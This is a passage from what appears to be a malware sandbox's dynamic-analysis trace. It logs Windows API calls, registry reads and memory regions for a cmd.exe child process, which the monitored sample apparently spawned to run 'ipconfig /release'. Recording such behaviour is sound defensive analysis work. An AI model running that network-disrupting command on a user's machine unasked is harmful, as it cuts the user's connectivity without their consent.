(nStdHandle=0xfffffff5) returned 0x3c [0277.413] GetFileType (hFile=0x3c) returned 0x2 [0277.414] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfe18 | out: lpMode=0xdfe18) returned 1 [0277.432] __iob_func () returned 0x74ac1208 [0277.432] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.432] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0277.432] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x6c3690*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0xdfe3c, lpReserved=0x0 | out: lpBuffer=0x6c3690*, lpNumberOfCharsWritten=0xdfe3c*=0x27) returned 1 [0277.433] GetProcessHeap () returned 0x6c0000 [0277.433] GetProcessHeap () returned 0x6c0000 [0277.433] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3f28) returned 1 [0277.433] GetProcessHeap () returned 0x6c0000 [0277.433] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3f28) returned 0x84 [0277.434] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3f28) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c7828) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c7828) returned 0x10 [0277.434] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c7828) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3880) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3880) returned 0x14 [0277.434] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3880) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c26c0) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c26c0) returned 0x1e [0277.434] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c26c0) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c77c8) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c77c8) returned 0x10 [0277.434] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c77c8) returned 1 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.434] GetProcessHeap () returned 0x6c0000 [0277.435] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3860) returned 1 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3860) returned 0x14 [0277.435] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3860) returned 1 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3690) returned 1 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3690) returned 0x50 [0277.435] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3690) returned 1 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c40d8) returned 1 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c40d8) returned 0x14 [0277.435] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c40d8) returned 1 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.435] GetProcessHeap () returned 0x6c0000 [0277.436] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3ea8) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3ea8) returned 0x14 [0277.436] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3ea8) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c45a0) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c45a0) returned 0x14 [0277.436] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c45a0) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c45c0) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c45c0) returned 0x14 [0277.436] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c45c0) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c7840) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c7840) returned 0x10 [0277.436] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c7840) returned 1 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.436] GetProcessHeap () returned 0x6c0000 [0277.437] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c45e0) returned 1 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c45e0) returned 0x14 [0277.437] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c45e0) returned 1 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4158) returned 1 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4158) returned 0x14 [0277.437] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4158) returned 1 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4178) returned 1 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4178) returned 0x14 [0277.437] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4178) returned 1 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4198) returned 1 [0277.437] GetProcessHeap () returned 0x6c0000 [0277.437] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4198) returned 0x14 [0277.438] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4198) returned 1 [0277.438] GetProcessHeap () returned 0x6c0000 [0277.438] GetProcessHeap () returned 0x6c0000 [0277.438] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c77f8) returned 1 [0277.438] GetProcessHeap () returned 0x6c0000 [0277.438] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c77f8) returned 0x10 [0277.438] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c77f8) returned 1 [0277.438] GetProcessHeap () returned 0x6c0000 [0277.438] GetProcessHeap () returned 0x6c0000 [0277.438] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c3840) returned 1 [0277.438] GetProcessHeap () returned 0x6c0000 [0277.438] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c3840) returned 0x14 [0277.439] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c3840) returned 1 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4620) returned 1 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4620) returned 0x14 [0277.439] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4620) returned 1 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c7810) returned 1 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c7810) returned 0x10 [0277.439] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c7810) returned 1 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c4640) returned 1 [0277.439] GetProcessHeap () returned 0x6c0000 [0277.439] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c4640) returned 0x14 [0277.440] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c4640) returned 1 [0277.440] GetProcessHeap () returned 0x6c0000 [0277.440] GetProcessHeap () returned 0x6c0000 [0277.440] HeapValidate (hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6c77b0) returned 1 [0277.440] GetProcessHeap () returned 0x6c0000 [0277.440] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6c77b0) returned 0x10 [0277.440] RtlFreeHeap (HeapHandle=0x6c0000, Flags=0x0, BaseAddress=0x6c77b0) returned 1 [0277.440] exit (_Code=0) Thread: id = 184 os_tid = 0x608 Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3811d000" os_pid = "0x1090" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C ipconfig /release" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2645 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2646 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2647 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2648 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2649 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2650 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2651 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2652 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2653 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2654 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2655 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 2656 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2657 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2658 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2659 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2660 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2661 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2662 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2663 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2664 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2665 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2666 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2667 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2668 start_va = 0x4a0000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2669 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2670 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2671 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2672 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2673 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2674 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2756 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2757 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2758 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2759 start_va = 0x820000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 2760 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2761 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2762 start_va = 0x4d60000 end_va = 0x5096fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 185 os_tid = 0x864 [0280.836] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0280.836] __set_app_type (_Type=0x1) [0280.836] __p__fmode () returned 0x74ac4d6c [0280.836] __p__commode () returned 0x74ac5b1c [0280.836] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0280.837] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0280.837] GetCurrentThreadId () returned 0x864 [0280.837] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x864) returned 0x84 [0280.842] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0280.842] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0280.842] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0280.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0280.862] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0280.862] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0280.863] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0280.863] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0280.863] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0280.863] GetConsoleOutputCP () returned 0x1b5 [0280.892] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0280.892] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0280.893] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.893] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0280.898] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.898] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0280.912] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.912] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0280.924] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.924] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0280.934] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.934] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0280.945] GetEnvironmentStringsW () returned 0x627cd8* [0280.946] GetProcessHeap () returned 0x620000 [0280.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa1a) returned 0x628700 [0280.946] FreeEnvironmentStringsA (penv="A") returned 1 [0280.946] GetProcessHeap () returned 0x620000 [0280.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4) returned 0x620550 [0280.946] GetEnvironmentStringsW () returned 0x627cd8* [0280.946] GetProcessHeap () returned 0x620000 [0280.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa1a) returned 0x629128 [0280.946] FreeEnvironmentStringsA (penv="A") returned 1 [0280.946] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0280.946] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0280.947] RegCloseKey (hKey=0x94) returned 0x0 [0280.947] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0280.947] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0280.947] RegCloseKey (hKey=0x94) returned 0x0 [0280.948] time (in: timer=0x0 | out: timer=0x0) returned 0x620b7534 [0280.948] srand (_Seed=0x620b7534) [0280.948] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C ipconfig /release" [0280.948] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C ipconfig /release" [0280.948] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0280.948] GetProcessHeap () returned 0x620000 [0280.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x210) returned 0x629b50 [0280.948] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x629b58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0280.948] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: 